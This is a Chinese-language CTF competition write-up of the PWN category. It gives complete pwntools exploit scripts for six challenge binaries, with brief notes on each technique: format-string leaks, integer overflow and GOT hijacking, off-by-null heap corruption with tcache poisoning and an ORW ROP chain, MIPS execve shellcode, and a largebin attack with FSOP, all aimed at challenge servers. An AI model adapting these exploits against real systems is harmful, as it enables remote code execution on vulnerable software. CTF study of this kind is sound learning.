AK了PWN,但其他方向基本爆0(

PWN

p2048

2048打完就通,随机数是固定的,所以每次出现的数字和位置都一样

1
2
3
4
from pwn import *
io = remote('39.106.48.123', 32818)
io.send('awddadwwdwdwdwwadwdwadwwdwdwwdwwwaddwdwdawdwwawdawdddddddwddwdadwwwwwdadwdwawdwdwadadwdddwawdwawdwdwdwddwdwadwdwwdwwdwdwwwddadwdawawdadwwdwdwddwwddwadwaddwawwddawdwwdwdwdwddwaddwadwdwdwwawwdwwdwawdwdwadwwwwwdwwdwwadwwawwdwwaddwdddadwdddwddwddwadaswdwdwwdawdwadwddwwdwwwawdwddwawdwdwdwdwddwwdawdwdwawdwawwdwdawdwddwdwadwdwawddawwdwwdwwddwddadwwwdwwwwwdwdadwddwwdadwddwwwdadwdwadaawwdwadwawdddwwddadddwdwddwdddadwdwddwadwwwawdawdwdwwdwdwdddwdwwdadwdddadwdddwwwdadwdwadwddawdwwadwawwdddddawddwdwdwdadwdwawddwaddwwdawawdwwadwdwdwdwdwadwdwwdwawdawdwdwawdwddwwdwadwawdwddwwdadwdddwwdwddddwaddwdwdwdawdddwwawwdwawdwwddwdadwadwdwwdadwdwaddwwwadwawddddawdwwdwdawwwdwwaswawdwddawwdwdddawdddawdwwwddwwdwdawdwdddadwdwawdwwdwadaddaddwdaddwddawdawdwawdwwddwawdwdwwddwdwdwwawdwwwdawdwdddawdwddwawwdadwwddadwdwddawdwddwddwawdwwdadadwwdwwadawdwdwwdadwawdddwdwdawddddddwdaawdadwdwddddadawawawddawdwdawdwawdwdwdwdwadwdwddawwddwaddawdwawwddwwdadadwdawadwawdwddawdwwawwdwwdddwadwaawawdwwdwadawwawwddwdwdadwdaawawdddddswdwdd')
io.interactive()

easy_LzhiFTP_CHELL

格串泄露程序基址,整数溢出,got表劫持

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
from pwn import *

io = remote('39.106.65.110', 31163)
context.binary = 'easy_LzhiFTP'

ru          = lambda x          : io.recvuntil(x, drop = True)
sa          = lambda a, b       : io.sendafter(a, b)
sla         = lambda a, b       : io.sendlineafter(a, b)
ia          = lambda            : io.interactive()
pie_os      = lambda x          : pie_base + x

def cmd(x):
    sla('IMLZH1-FTP> ', x)

sa('Username: ', '133')
sa('Input Password: ', flat(0xa00000072))
sa('(yes/No)', 'No%6$p\n')
ru('No')
pie_base = int(ru('\n'), 16) - (0x55eebea27096 - 0x55eebea25000)
strcspn_got = pie_os(0x0000000000004060)
pld = flat([
    'toucha',
    strcspn_got,
    0,
])
idx = (0x0000000000004A80 - 0x0000000000004B00) / 8
cmd(pld)
sla('Context:', 'a')

cmd('edit')
sa('idx:\n', str(idx))
sa('Content: ', flat(pie_os(0x00000000000011C0)))
cmd('/bin/sh\x00')
ia()

babyaul

ida里把这一段nop掉会发现有个off by null

off by null → fake unsortedbin chunk → chunk overlapping → hijack tcache fd pionter → leak stack → hijack tcache fd pionter → hijack retaddr → orw rop

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
from pwn import *
from ctypes import *

io = remote('39.106.65.110', 14188)
context.binary = './babyaul'

elf = ELF('./babyaul', checksec = False)
libc = ELF('libc-2.31.so', checksec = False)
dll = cdll.LoadLibrary('libc-2.31.so')

rc          = lambda n          : io.recv(n)
ru          = lambda x          : io.recvuntil(x, drop = True)
sd          = lambda x          : io.send(x)
sla         = lambda a, b       : io.sendlineafter(a, b)
ia          = lambda            : io.interactive()
uu64        = lambda x          : u64(x.ljust(8, '\x00'))
libc_os     = lambda x          : libc_base + x
heap_os     = lambda x          : heap_base + x
libc_sym    = lambda x          : libc_os(libc.sym[x])

def cmd(x):
	sla('>', x)

def add(size, mode, content):
	cmd('add')
	sla('size?', str(size))
	sla('mode?', str(mode))
	sd(content)

def delete(idx):
	cmd('del')
	sla('index?', str(idx))

def show(idx):
	cmd('get')
	sla('index?\n', str(idx))

cmd('pass')
dll.srand(dll.time(0))
ans = bytearray(dll.rand() % 43 + 48 for _ in range(4))
sla('pass:', str(ans))

add(0x500, 3, 'junk')	#0
add(0x500, 3, 'junk')	#1
add(0x500, 3, 'junk')	#2
pld = flat({
	0x98: 0xb91 + 2 * 0x110
})
add(0x500, 3, pld)	#3
delete(0)
add(0x500, 3, 'a')	#0
show(0)
libc_base = uu64(rc(6)) - (0x7f2c510a4b61 - 0x7f2c50eb8000)
environ = libc_sym('environ')

delete(0)
delete(2)
add(0x500, 3, 'a' * 8)	#0
show(0)
ru('a' * 8)
heap_base = uu64(rc(6)) - (0x558eab44cc50 - 0x558eab441000)

add(0x500, 3, 'a' * 8)	#2
add(0x100, 2, 'a' * 8)	#4
add(0x100, 2, 'a' * 8)	#5
add(0x100, 2, 'a' * 8)	#6
add(0x100, 2, 'a' * 8)	#7
add(0x100, 2, 'a' * 8)	#8
add(0x4f0, 3, 'a' * 8)	#9
add(0x4f0, 3, 'a' * 8)	#10
add(0x4f0, 3, 'a' * 8)	#11
delete(9)
pld = flat({
	0x4f0: 0xb90 + 2 * 0x110
})
add(0x4f8, 3, pld)	#9
delete(3)
pld = flat({
	8: 0x501,
	0x10: heap_os(0x557bbfbd9200 - 0x557bbfbcd000),
	0x18: heap_os(0x557bbfbd9200 - 0x557bbfbcd000),
	0x98: 0xb91 + 2 * 0x110,
	0xa0: heap_os(0x557bbfbd9170 - 0x557bbfbcd000),
	0xa8: heap_os(0x557bbfbd9170 - 0x557bbfbcd000)
})
add(0x500, 3, pld)	#3
delete(10)
delete(6)
delete(5)
add(0x500, 3, flat({0x470: environ - 0x10}))	#5
add(0x100, 2, 'a')	#6
add(0x100, 2, 'a' * 0x10)	#10
show(10)
ru('a' * 0x10)
ret_addr = uu64(rc(6)) - (0x7fff4817b6f8 - 0x7fff4817b308)
delete(8)
delete(7)
add(0x500, 3, flat({0x180: ret_addr}))	#7
add(0x100, 2, 'flag\x00')	#8
flag_str_addr = heap_os(0x5578779648a0 - 0x557877958000)
open_addr = libc_sym('open')
read_addr = libc_sym('read')
write_addr = libc_sym('write')
pop_rdi = libc_os(0x0000000000023b72)
pop_rsi = libc_os(0x000000000002604f)
pop_rdx_r12 = libc_os(0x0000000000119241)
rop_chain = flat([
	pop_rdi,
	flag_str_addr,
	pop_rsi,
	0,
	open_addr,
	pop_rdi,
	3,
	pop_rsi,
	heap_base + 0x200,
	pop_rdx_r12,
	0x30,
	0,
	read_addr,
	pop_rdi,
	1,
	write_addr
])
add(0x100, 1, rop_chain)
ia()

sigin_shellcode

随机数预测,mips shellcode,addiu指令机器码0截断绕过shellcode白名单检测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from pwn import *
from ctypes import *

io = process('./sc')
context.binary = 'sc'
dll = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')

sa          = lambda a, b       : io.sendafter(a, b)
sla         = lambda a, b       : io.sendlineafter(a, b)
ia          = lambda            : io.interactive()
dbg         = lambda x = None   : gdb.attach(io, x)

def menu(choice):
    sla('Go> \n', str(choice))

def down():
    global Floor_num
    menu(1)
    dll.srand(0x1BF52)
    sla('How much do you want?\n', str(dll.rand() % 114514 % (Floor_num + 1)))
    Floor_num += 1

def shopping(choice):
    menu(3)
    sla('> \n', str(choice))

Floor_num = 0
for _ in range(99):
    down()
shopping(2)
shopping(3)
down()
sc = '''
addiu $a1,$zero,0
addiu $a2,$zero,0
addiu $v0,$zero,4011
syscall 0x40404
'''
sc = asm(sc)
sa('Shellcode > \n', sc)
ia()

边上课边打的三血

babygame

随机数预测,bss段溢出,指针变量覆写,bss段格串,got表劫持

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
from pwn import *
from ctypes import *
io = remote('47.93.6.210', 36357)
context.binary = 'pwn'

elf = ELF('pwn', checksec = False)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec = False)
dll = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')

rc          = lambda n          : io.recv(n)
ru          = lambda x          : io.recvuntil(x, drop = True)
sa         = lambda a, b        : io.sendafter(a, b)
sla         = lambda a, b       : io.sendlineafter(a, b)
ia          = lambda            : io.interactive()
uu64        = lambda x          : u64(x.ljust(8, '\x00'))

def menu(choice):
    sla('>> ', str(choice))

def play(level):
    menu(1)
    sa('Please enter your level : ', str(level))
    for i in range(20):
        dll.srand(dll.time(0))
        x = 'abcdefghijklmnopqrstuvwxyzA'
        src = ''
        for _ in range(4):
            src += x[dll.rand() % 26]
        src += 'a'
        sa('Give me : ', src)

play(4)
sa('Give me : ', 'a')
menu(2)
menu(2)
sa('What size do you need : \n', '280')
menu(2)
menu(1)
pld = flat({
    0x100: 0x0000000000602078
}, filler = '\x00')
sa('Enter the letter you want to purchase\n', pld)
menu(2)
menu(4)
ru('4')
libc_base = uu64(rc(6)) - libc.sym['atoi']
sys_addr = libc_base + libc.sym['system']
menu(2)
menu(1)
pld = flat({
	0: '%' + str(0x0000000000602078) + 'c' + '%28$ln',
    0x100: 0x0000000000602120
}, filler = '\x00')
sa('Enter the letter you want to purchase\n', pld)
menu(2)
menu(4)

menu(2)
menu(1)
pld = flat({
	0: '%' + str(int(hex(sys_addr)[-4:], 16)) + 'c' + '%41$hn',
}, filler = '\x00')
sa('Enter the letter you want to purchase\n', pld)
menu(2)
menu(4)

menu(2)
menu(1)
pld = flat({
	0: '%' + str(0x0000000000602078+2) + 'c' + '%28$ln',
    0x100: 0x0000000000602120
}, filler = '\x00')
sa('Enter the letter you want to purchase\n', pld)
menu(2)
menu(4)

menu(2)
menu(1)
pld = flat({
	0: '%' + str(int(hex(sys_addr)[-8:-4], 16)) + 'c' + '%41$hn',
}, filler = '\x00')
sa('Enter the letter you want to purchase\n', pld)
menu(2)
menu(4)

menu(2)
menu(2)
sa('What size do you need : \n', 'sh\x00')
ia()

上课偷摸的三血

three-body

UAF,先申请一个大小能覆盖多个chunk的chunk,将其释放再分开来申请,然后写的时候就能一次性同时控制这几个chunk的内容

largebin attack → hijack IO_list_all → fsop

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
from pwn import *
from ctypes import *

io = remote('39.106.48.123', 27653)
context.binary = 'pwn'

elf = ELF('pwn', checksec = False)
libc = ELF('libc-2.35.so', checksec = False)
dll = cdll.LoadLibrary('./libc-2.35.so')

rc          = lambda n          : io.recv(n)
ru          = lambda x          : io.recvuntil(x, drop = True)
sla         = lambda a, b       : io.sendlineafter(a, b)
ia          = lambda            : io.interactive()
uu64        = lambda x          : u64(x.ljust(8, '\x00'))
libc_os     = lambda x          : libc_base + x
heap_os     = lambda x          : heap_base + x
libc_sym    = lambda x          : libc_os(libc.sym[x])

def menu(choice):
    sla('Your choice: ', str(choice))

def add(idx, size):
    global dll
    while True:
        menu(1)
        sla('Select an area to explore: ', str(idx))
        sla('Enter the size of the range you want to explore this time: ', str(size))
        rand_val = dll.rand()
        rand_val %= 10
        if rand_val > 4:
            sla('Your decision: (1: yes / 0: no)', '1')
        else:
            sla('Your decision: (1: yes / 0: no)', '0')
            break

def delete(idx):
    menu(2)
    sla('Select an area you want to abandon to return: ', str(idx))

def edit(idx, size, content):
    menu(3)
    sla('Please select which area to talk to: ', str(idx))
    sla('Since remote calls are costly, enter the specific number of words you want to send: ', str(size))
    sla('Please write down your conclusions: ', content)

def show(idx):
    menu(4)
    sla('Select to enter an area to receive a signal from the Trisolarans: ', str(idx))

get = process('./get')
srand_arg = int(get.recvuntil('\n'))
get.close()
dll.srand(srand_arg)
add(0, 0x500)
add(1, 0x500)
add(2, 0x500)
add(3, 0x500)
delete(0)
delete(2)
show(0)
ru('The information that the Trisolarans have to tell you is as follows:\n')
libc_base = uu64(rc(8)) - (0x7f1f6e14dce0 - 0x7f1f6df34000)
sys_addr = libc_sym('system')
heap_base = uu64(rc(8)) - (0x55ee29498cb0 - 0x55ee29498000)
add(4, 0x500)
add(5, 0x500)
add(6, 0x1000)
add(7, 0x500)
delete(6)
add(7, 0x510)
add(8, 0x5d0)
add(9, 0x500)
add(10, 0x500)
delete(7)
fake_file_addr = heap_os(0x55d67786d1d0 - 0x55d67786b000)
pld = flat({
    0: [
        libc_os(0x7f539fab6110 - 0x7f539f89c000),
        libc_os(0x7f539fab6110 - 0x7f539f89c000),
        heap_os(0x55b75b89c6d0 - 0x55b75b89b000),
        libc_os(0x7f7eb3332680 - 0x7f7eb3118000 - 0x20)
    ],
    0xaf0: {
        0: [
            '  sh;\x00\x00\x00',
            0x511
        ],
        0x68: sys_addr,
        0x88: heap_base + 0x100,
        0xa0: fake_file_addr + 0x100,
        0xd8: libc_os(0x7f30b82ca0c0 - 0x7f30b80b4000),
        0x100: {
            0x18: 0,
            0x30: 0,
            0xe0: fake_file_addr
        }
    }
}, filler = '\x00')
add(11, 0x600)
edit(6, len(pld), pld)
delete(9)
add(12, 0x1000)
menu(5)
ia()